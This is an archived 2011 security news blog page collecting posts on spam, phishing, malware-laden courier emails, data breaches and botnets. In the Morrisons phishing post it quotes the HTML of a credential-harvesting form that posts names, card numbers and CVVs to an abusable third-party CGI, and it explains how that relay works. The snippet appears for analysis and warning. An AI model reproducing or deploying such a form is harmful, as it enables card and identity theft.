Showing posts with label email. Show all posts
Showing posts with label email. Show all posts

Tuesday, 12 April 2011

DHL Express spam campaign leads to fake AV

A new spam campaign impersonating the popular mail service DHL Express is currently underway, warn Bkis researchers.

The email in question looks like this:



Once the user downloads and opens the attachment, the worm contained in it downloads a fake AV solution from a server located in Russia.

The fake AV ("XP Home Security") immediately starts its work and tries to trick the user into buying a full version that will supposedly remove all the infections it found.

Users are warned to be careful when reviewing emails purportedly coming from DHL express or any of the other well-known express mail services - more often than not, they are fake emails containing malicious attachments.

[net-security]

Thursday, 24 March 2011

TripAdvisor member database breached, part of it stolen


Just days after Play.com notified its customers of a breach that resulted in their email addresses being compromised and some of its users being targeted with malicious emails, it's the turn of another Internet giant to send out warning emails to its customer base.

According to Tom Mollerus, TripAdvisor has been contacting its users and notifying them of a breach.

"This past weekend we discovered that an unauthorized third party had stolen part of TripAdvisor's member email list. We've confirmed the source of the vulnerability and shut it down," says Steve Kaufer, co-founder and CEO of TripAdvisor, in the email.

"How will this affect you? In many cases, it won't. Only a portion of all member email addresses were taken, and all member passwords remain secure. You may receive some unsolicited emails (spam) as a result of this incident."

He also made sure to point out that the site does not collect members' credit card or financial information, and that it would never sell or rent its member list.

Information about the incident has already been shared with law enforcement, and an investigations into the breach is ongoing.

Play.com customers receiving malicious emails, Silverpop blamed


The notification and the warning that Play.com sent out to its customers following a breach of systems belonging to the company that handles part of its marketing communications seems to have been a reaction to its customers' complaints on public online forums and direct complaints to the company.

"On Sunday the 20th of March some customers reported receiving a spam email to email addresses they only use for Play.com," said John Perkins, Play.com CEO, in a statement issued yesterday. "We reacted immediately by informing all our customers of this potential security breach in order for them to take the necessary precautionary steps.

He also identified the third-party marketing company that handles their communications: it's Silverpop. As you might remember, the compromise of Silverpop's systems has brought about problems to McDonald's, deviantArt's and Walgreens' customers.

"We believe this issue may be related to some irregular activity that was identified in December 2010 at our email service provider, Silverpop," Perkins revealed.

When the Silverpop breach was first revealed, I believed that it would be a good idea for all Silverpop Systems clients - and there are many! - to warn their customers about the possibility of being on the receiving end of malicious spam, and now it seems that I was right.

The only thing that's bothering me is the fact that email addresses belonging to Play.com customers were misused only now - three months after the Silverpop breach was made public. Why did the spammers wait so long?

"Investigations at the time showed no evidence that any of our customer email addresses had been downloaded," said Perkins. Could it be that Play.com's mailing list was stolen in a second breach that happened more recently?

Monday, 21 March 2011

Rustock Botnet: Dead Or Just Reloading?

Reports indicate that the massive drop in spam levels are linked to the sudden disappearance of the Rustock botnet. However, recent history suggests the interruption may only be temporary.

Spamhaus’s Composite Spam Blocklist (CBL) claims that dozens of Rustock’s internet servers, which for years have been pumping spam messages and slinging faux pharmaceutical ads, stopped operating Wednesday morning in near simultaneity.

While there's agreement that Rustock is offline - at least for now- its not clear if the interrpution in spam is the result of a take-down or of Rustock reloading.


Thus far, Rustock interruptions have been sporadic and short-lived, creating a statistical ebb and flow where its volume has hit and hovered around zero, but never staying there for any significant period of time. Not so with the latest interruption in service, which shows Rustock flat lining since 10:54 am EST Wednesday.

Rustock has been the leading source of spam for some time, generating between 50% and 70% of worldwide spam volumes. While no firm data is available on the numbers of e-mail messages sent out through Rustock, the number is likely to be staggering, which is impressive considering Threatpost reported yesterday that the relatively smaller Pushdo botnet has generated some 1.7 trillion spam messages.

This, despite efforts to limit the impact of botnets by using blacklists to block traffic from infected systems.

[ThreatPost]

Sunday, 20 March 2011

Top Five Online Scams

#1 Nigerian Scams:


While these types of scams are generally understood to be Nigerian in nature and origin, and are in fact named after the 419 Nigerian code that made them illegal, advanced-fee scams happen right here in the good old USA by Americans presenting to offer jobs or may ask help to transfer money.


#2 Romance Scams:

If you ever hear talk like this, run far and fast: “In me sweetheart you are going to find the most passionate, loving and romantic man you have ever met. There are very few promises in life but this is one of them! ROMANCE is the key to my happiness and to my heart and soul!”


#3 Classified Ad Scams:

This story caught my eye: “An online scam targeting pet-lovers is circulating the web, and it could cost you more than a new pet. An ad posted to a local online classified website by a man who claimed he was living in Florida. He was willing to give the Labrador Retriever puppy named Dely away for the cost of shipping, which was $220.”


#4 Phishing:

Phishing continues to become more sophisticated, more effective, and more prevalent. In one example, criminal hackers waited until Pennsylvania school administrators were on vacation, then used simple money transfers to liquidate over $440,000 out of the districts accounts.


#5 Spear Phishing:

Spear phishing occurs when the scammers concentrate on a localized target, usually an individual with control over a company’s checkbook.

This insidious type of phishing occurs when a recipient clicks a link, either in the body of an email or on the spoofed website linked in the email, and a download begins.

Don’t be taken. Keep your head up and recognize when someone’s trying to take advantage of you.


Robert Siciliano personal and home security specialist to Home Security Source discussing home security and identity theft on TBS Movie and a Makeover.


[InfoSecIsland]

Four Fold Increase in eMail-Based Malware

Recently Network Box have been noticing an unusual increase in eMail-based malware. They have not seen such an increase for several years, and this is occurring globally:

image

Four Fold Increase in Malware

More statistics can be seen at http://response.network-box.com/.

A glance at the malwares-per-hour statistics that our customer boxes are reporting clearly shows that the malware is coming in from hundreds of thousands of sources, in emails with varying subjects.
So far, Network Box heuristics such as NBH-BGTRACK and zero-day Z-scan protection systems are containing this increased threat. 

The increase is more than 4 times baseline, and all the samples that are being seen are emerging, never-before-seen, zero-day threats.

This increased activity is probably caused by botnet herders attempting to increase the size of their botnets, and this will probably be followed by a corresponding increase in spam levels.

Accordingly, Network Box have raised their alert condition to 3.  It might be that the recent decline in Spam may be reversed.

[InfoSecIsland]

Inside the Cybercrime Underworld: 100 Billion Spam E-Mails a Month

American and German researchers who infiltrated and crippled one of the world’s biggest spam-producing networks last summer have released a formal paper on the experience, and the numbers are staggering.

The Pushdo/Cutwail “botnet” sent out 1.7 trillion e-mails over 15 months (about 113 billion per month), had 100,000 enslaved “bots” around the world and had about 30 command-and-control servers in

Europe, North America and Russia.

Its Russian cybercriminal operators bought and sold e-mail addresses by the million and compromised PCs by the thousand, with lower prices for less-desirable countries and volume purchases.

[Read the original research paper here (PDF).]

"The interesting things were just the amount of spam that they were sending and how they operate like a professional business, with detailed statistics and error reporting,” Brett Stone-Gross, one of the researchers and a doctoral candidate at the University of California, Santa Barbara, told Kaspersky Lab’s ThreatPost blog. “This is a real business."

The 16 Pushdo/Cutwail servers that the researchers were able to access contained 2.35 terabytes of data, 24 databases full of details about operations and billions of target e-mail addresses.

The researchers estimate that the botnet’s operators have earned between $1.7 million and $4.2 million since June 2009.

Even one sub-botnet — Pushdo/Cutwail was divided into several domains, each under the control of one gang member — was able to pump out 87.7 billion e-mails in the four weeks between July 30 and August 25, 2010.

"I was most surprised by the sheer number of e-mails sent by this one botnet," another researcher, Thorsten Holz of Ruhr-University Bochum in Germany and Lastline, Inc., in Santa Barbara, told UBM TechWeb’s Dark Reading blog. "It turns out this one botnet sent out billions of spam messages."

Symantec Labs estimated last year that 89 percent of all e-mails are spam.


Takedown

The research team got service providers to pull the plug last summer on about 20 of Pushdo/Cutwail’s 30 command-and-control servers. (The other service providers refused.) The botnet was crippled for several months.

Botnets are illicit networks of computers that have been enslaved by malware, which burrows deep into their operating systems and opens “backdoors” that allow control by remote operators, or “bot herders.”
Malware infection usually happens when a user opens a compromised e-mail attachment (a Trojan) or visits a compromised website (a drive-by download).

The bots, ordinary machines scattered across the globe whose users have no idea they are infected, are used to send out spam touting Viagra and pornography, phishing e-mails and Trojans to harvest more bots.

Almost 40 percent of Pushto/Cutwail’s bots were in India, Holz and his colleagues found. Other countries’ shares were far lower; Australia came in second, comprising 9 percent of the compromised PCs.

Holz and his colleagues also got an archived copy of Spamdot.biz, an online forum used by botnet operators for communication and trade, which provided a fascinating look into the world of mid-level cybercriminals.

More than 90 percent of the posts on Spamdot.biz were in Russian, and less than 9 percent in English. It had nearly 2,000 registered members, who had to be recommended by at least two other existing members to be accepted.

E-mail addresses were bought and sold in blocks of a million, with prices ranging from $25 to $50 per block depending on geographical location, status (free Web-based e-mail services such as Gmail or Hotmail were cheaper) and volume.

Specialized groups sold services, such as infecting new batches of computers with the client’s malware. These sold in blocks of 1,000, with prices ranging from $13 for Asian computers to $125 for PCs based in the United States.


Top-notch software

The software used by the Pushdo/Cutwail botnet was remarkably sophisticated. Each server running Cutwail, the spam engine, constantly tested its messages against a built-in copy of the SpamAssassin e-mail filter.

Pushdo, the Trojan used for command and control, used a proprietary, and often encrypted, communications protocol to direct its bots.

Despite the technological efforts and the sheer volume of spam sent out, only 30 percent of Pushdo/Cutwail’s e-mails ever reached their target servers, the researchers estimate. Half went to invalid addresses, and nearly 17 percent were blacklisted.

"That's quite a big loss," Holz told DarkReading. "And even if the mail is received by the targeted mail server, with filtering and SpamAssassin a large chunk of that 30 percent gets filtered and doesn't necessarily reach the inbox of the user."

Still, having all this information isn’t much of a victory in the fight against spammers.

Pushdo/Cutwail has been rebuilt since last summer and is now back up to its pre-takedown size of about 100,000 bots. It’s the second-largest botnet in the world; the Rustock botnet has an estimated 250,000 enslaved PCs.

How can you prevent your computer from being enslaved by a botnet? No method is foolproof, but your odds of infection drop dramatically if you do two things: Don’t open any unrequested e-mail attachments, even those from friends; and install and constantly update and run anti-virus software, even if you’re using a Mac.

Using a Mac instead of a Windows PC also does help, at least for now. Macs are not immune from infection and a few Mac Trojans have been found in the wild, but Apple’s PC market share is still so small that most cybercriminals don’t bother writing malware for it.

[SecurityNewsDaily]

Tackle cyber-bullying!

The other day, my husband and I were sitting al fresco enjoying a coffee, when I noticed a bunch of teenagers sitting at the table next to us. Most of them were fiddling about with their latest generation mobile telephones when I heard one of the girls comment: “You should not have interfered in Laura and Pedro’s relationship. It is none of your business what they do. You have most definitely overstepped the mark! She was reading out loud the comment she had just posted, when a couple other friends immediately posted further comments of the sort.

So what? Yes, I know, it does not have to turn into a nasty situation, but, then again, the opposite could happen very quickly. Because, as Mark Zuckerberg said at a technology conference hosted by TechCrunch: “Today, users are more comfortable sharing more information more openly. The social norms have evolved.” Fair enough, I fully acknowledge the advantages of social networks but, in the case of teenagers, they can be a double-edged sword and I cannot help but thinking how easy somebody’s reputation can publicly and rapidly be damaged. What is known as cyber-bullying or “the use of information and communication technologies to support deliberate, repeated, and hostile behavior by an individual or group, that is intended to harm others”.

Because, deep down, and paradoxically, as I am saying this from a blog :-) , I think social networks are the perfect tool to feed one’s ego. And the ego of a teenager is still “in progress”: they need to reaffirm their identity and because the visibility of they write is immediate, they can build their personality as they post along. Some of them actually find it easier to express their views by just hitting Send, or Post than by words. Through social networks, teenagers can get adherence to their comments, involve their allies and reinforce their role as a leader. Harassing the weaker teenager is not a new phenomenon, yet the Internet allows the harasser to take refuge in the comfort of anonymity. Social networks can take the role of the new “toilet wall” where teens used to write insults and names to annoy their colleagues.

It is tricky. Whenever I have mentioned to the parents of friends of my pre-teen daughter how important it is for us to keep an eye on how our kids behave on social networks and how it is vital to promote tolerance and civism, I very often get looks as to say: You control freak!

Well, all I can say is: would you not warn your baby if his fingers are dangerously close to an electric plug? To me, it is a question of sheer common sense because teenagers are very vulnerable yet adorable creatures (well, most times ;) ) What do you think?

Further information and useful links on cyber-bullying.

[ComputerSecurityArticles]

Morrisons supermarkets subject for phishing campaign

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.

The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <noreply@morrisons.co.uk>” and has the folowing body contents:
This email is intended to inform you that there is a new offer at Morrisons Store.
This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.
In order to start the registration process please fill and submit the form attached to this email.
© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.
Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:



The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit, or abuse, as well.

<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv” />
<input name=”submit_to” type=”hidden” value=”adw.gray@gmail.com” />
<input name=”submit_by” type=”hidden” value=”abcdursulica@gmail.com” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />

These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form.

All the details are in the HTML page.

The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.
Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.
Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.


[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:
offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

[ComputerSecurityArticles]

Wednesday, 9 March 2011

Cyber crime economy – the Spammer side

Not just the people infecting PCs with malware want to earn money – the spammers want their share, too. The most obvious way to earn money for them is of course when people buy the advertised products – fake Viagra, watches, pirated software and so on. But for the spammers there are also affiliate programmes which generate revenue for them.

The affiliate programmes the spammers use work by redirecting traffic to their website; they pay money for visitors redirected to them. It is not the first time that we see this happening as we’ve seen spam for Google Adwords and a “business” model similar to this one, but the whole deal has to be really worth the trouble in order to go and use this method of producing traffic.

The emails the spammers sent this time use social engineering tactics to create psychological pressure and make the recipients click the link.



To be honest, I clicked on that URL (in a VM) concerned that it might drop a Trojan or perform some malicious action. To my surprise, it did not. It opened an intermediate website instead – which is a URL shortener that opened yet another site.



The last website opened was Amazon.de (.de and not .com) and not a random page, but a page advertising an iPhone 3GS sold by Notebook.de.



I don’t know if there is a connection between the spam campaign and the website Notebook.de (which to my knowledge is a clean and respected website).

How this business works gets clear when visiting the URL shortener itself: Register a shortened website and get paid for visitors. But how does the business model work in this case? Well, if you look at the screenshot, you can see a big yellow button with words “SKIP AD”. If you click there, you are redirected to some survey websites which make money with the user’s feedback.



What you can also see is that if you want your website advertised you pay $ 5 for 10.000 visitors. Let’s make a basic ROI calculation for the owners of the URL shortener: According to the text in the blue rectangle, $ 4 are paid for 1000 visitors. Thus for $ 5 the “customer” needs to redirect 1250 visitors.

According to the URL Shortener’s advertisement, they get paid $ 5 for 10.000 visitors but they pay $ 5 for 1250 visitors. This doesn’t sound very smart for a business as obviously they pay more money than they get.

Is the spammer smarter than the company behind the URL shortener? Assuming the spammer gets $ 5 for 1250 visits, and only 1 of 100 recipients of the email clicks onto the link in the mail (or the other 99 emails were blocked), he would have to send 125.000 emails in order to get paid $ 5. Among security experts it is assumed that spammers pay between $ 0.0001 and $ 0.001 (0.01 – 0.1 cents) per email sent.

Thus the spammer would need to pay between $ 1.25 and $ 12.50 to send this amount of emails. So the return of investment is only positive when the cost of sending a spam mail is low (around $ 0.0001 / email).

I don’t know how the spammers really end up, but since we received this email in our inboxes I assume that the ROI is positive for both, the spammers and for the URL shortener service.

I have a problem with this kind of advertisement-links – there is not much to block! I mean, we can’t block bit.ly, we can’t block the URL shortener which pays the $ 4 for 1000 visitors, and we definitely can’t block amazon.de. All I could do was to report the bit.ly shortcut from the email to bit.ly and hope it will be blocked soon. Fortunately, the spam email itself is quite easy to block because it is being sent to 395 recipients at once in a mass mailing action. However, Gmail’s spam filter wasn’t able to stop it – but Avira Antispam marked it immediately with spam level “Very High”.

[ComputerSecurityArticles]

Sloppy spelling scuppers DHL malware spam attack

Thank heavens for the poor education of cybercriminals!

If they had paid more attention to spelling and grammar at school (rather than mugging younger kids for their dinner money and inflicting chinese burns behind the bicycle sheds) then maybe some of their scams would be harder to spot.

Take this malware campaign that we are seeing being spammed out right now, for instance.

DHL malicious spam
Subject: DHL notification
Message body:
Dear customer.
The parcel was send your home address.
And it will arrice within 7 bussness day.
More information and the tracking number
are attached in document below.
Thank you.
2011 DHL International GmbH. All rights reserverd.
The email doesn't really come from DHL, of course. This is just the latest in a long line of instances where cybercriminals have distributed malware attacks posing as communications from a delivery firm such as UPS or FedEx.

But take a closer look. There are 37 words in the body of that message, four of which are spelt incorrectly. That's an almost 11% failure rate!

If the spelling mistakes and lack of professionalism weren't enough to get your security sixth sense jangling, then hopefully your anti-virus would have identitifed that the attached DHL_document.zip file contains malware.

Sophos products detect the ZIP file proactively as Mal/BredoZp-B, and its Trojan horse contents as Troj/Agent-QQG.

I, for one, vote against improving the grammar and spelling of cybercriminals. We can't rely on every malicious hacker being a poor communicator, but it certainly can help the general public identify when a message should be treated with suspicion.

[NakedSecurity]

Sunday, 6 March 2011

‘United Parcel Service notification’ email contains trojan

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “United Parcel Service notification” send from the spoofed address “United Parcel Service <support2pyq@ups.com>”.

The body of the email is made from an image but on our computer the image is broken. The included image UR points to http://1stchoiceindustrial.com/bd32t.jpg but no file is found on this server. I’m sure that we can guess what they are willing to share with us.

The attached ZIP file has the name document.zip and contains the 37 kB large file document.exe.

The trojan is known as TROJ_SPYEYE.SMEP (Trend Micro), Trojan.Agent/Gen-FakeAlert[RnGlobal] (SuperAntiSpyware), W32/Bamital.FA!tr (Fortinet).

At the time of writing, only 5 of the 43 AV engines did detect the trojan at Virus Total.

[Virus Total] via [ComputerSecurityArticles]

Friday, 4 March 2011

The Spam King is free again, claims his spamming days are over

Robert Soloway, one of the most prolific spammers whose activities earned him the nickname Spam King, has been released from prison after a little less than 4 years inside.



He is allowed to go back online, but according to his plea deal, probation officers will monitor his e-mail correspondence and which websites he visits for the next three years.

“If I send out spam e-mails, that’s a violation of my probation. End of story,” he said to Wired. “I’m being very careful. If I send out an e-mail, I’m not even going probably to CC it. I’ll send a unique e-mail to each person.”

After and estimated 10 trillion spam e-mails sent doing his "career", teaching other people to spam, selling spam packages and using botnets to spread the e-mails - and living the good life during all that time - he now lives in a modest studio apartment in Seattle and works in a print shop.

He says he learned the lesson and now wants to help businesses and consumers avoid spam. “I don’t expect anyone to trust anything I say until they see me making good,” he declared. "I would like to assist in some way by basically revealing what went on inside the cybercrime industry."

[Net-Security]

Thursday, 3 March 2011

E-mail spam drops by half, search malware on the rise

Attackers are making a shift from using e-mail spam to more aggressively targeting the Internet, according to Barracuda Network.



E-mail spam dropped by half during 2010, while search engine malware doubled and the Twitter crime Rate increased 20 percent, signifying a concentrated focus on the more lucrative social networks and search engines as attack vectors.


“Attackers focus on where they can get the most eyeballs and profit, and today that means social networks and search engines,” said Dr. Paul Judge, chief research officer at Barracuda Networks. “As a community we often point to the need for user education as the missing component; however, the levels of social engineering involved in today's attacks suggest that we must continue to elevate our technological approaches. The research community must continue to build innovative defenses and the industry must make efforts to increase the deployment rates of those defenses.”

[net-security]

Wednesday, 2 March 2011

Scam emails can now be forwarded to the Police


Action Fraud - the UK’s national fraud reporting centre run by the governmental National Fraud Authority - has recently set up a dedicated e-mail address to which users are encouraged to forward every scam e-mail they receive.

The e-mails sent to this address - email@actionfraud.org.uk - are forwarded to the National Fraud Intelligence Bureau run by the City of London Police, which then engages in analysis in order to extract possible evidence from the messages, to think up ways for fraud prevention, for disruption of links between fraudsters and victims and for targeting the fraudsters' networks in the future.

"The NFIB analyses this information, searching for patterns and similarities between reports, which come from across the country. Intelligence packages are formed from the data and sent to relevant law enforcement agencies such as the police and Serious Organised Crime Agency," says Action Fraud, and adds a few tips on how to spot fake e-mails:

Fake e-mails often (but not always) display some of the following characteristics:
  • the sender’s e-mail address doesn’t tally with the trusted organisation’s website address
  • the e-mail is sent from a completely different address or a free web mail address
  • the e-mail does not use your proper name, but uses a non-specific greeting like “dear customer”
  • a sense of urgency; for example the threat that unless you act immediately your account may be closed
  • a prominent website link. These can be forged or seem very similar to the proper address, but even a single character’s difference means a different website
  • a request for personal information such as user name, password or bank details
  • the e-mail contains spelling and grammatical errors
  • you weren't expecting to get an e-mail from the company that appears to have sent it
  • the entire text of the e-mail is contained within an image rather than the usual text format
  • the image contains an embedded hyperlink to a bogus site.
According to the National Fraud Intelligence Bureau, only four days after the setting up of the dedicated e-mail address it has already received 19,000 scam e-mails.

“We thank the general public for this overwhelming response and urge them to keep on forwarding us their scam emails," said Detective Superintendent Tony Crampton, Director of the NFIB. "These will all be analyzed at the NFIB and the resulting intelligence will be used to disrupt the architects of these crimes.”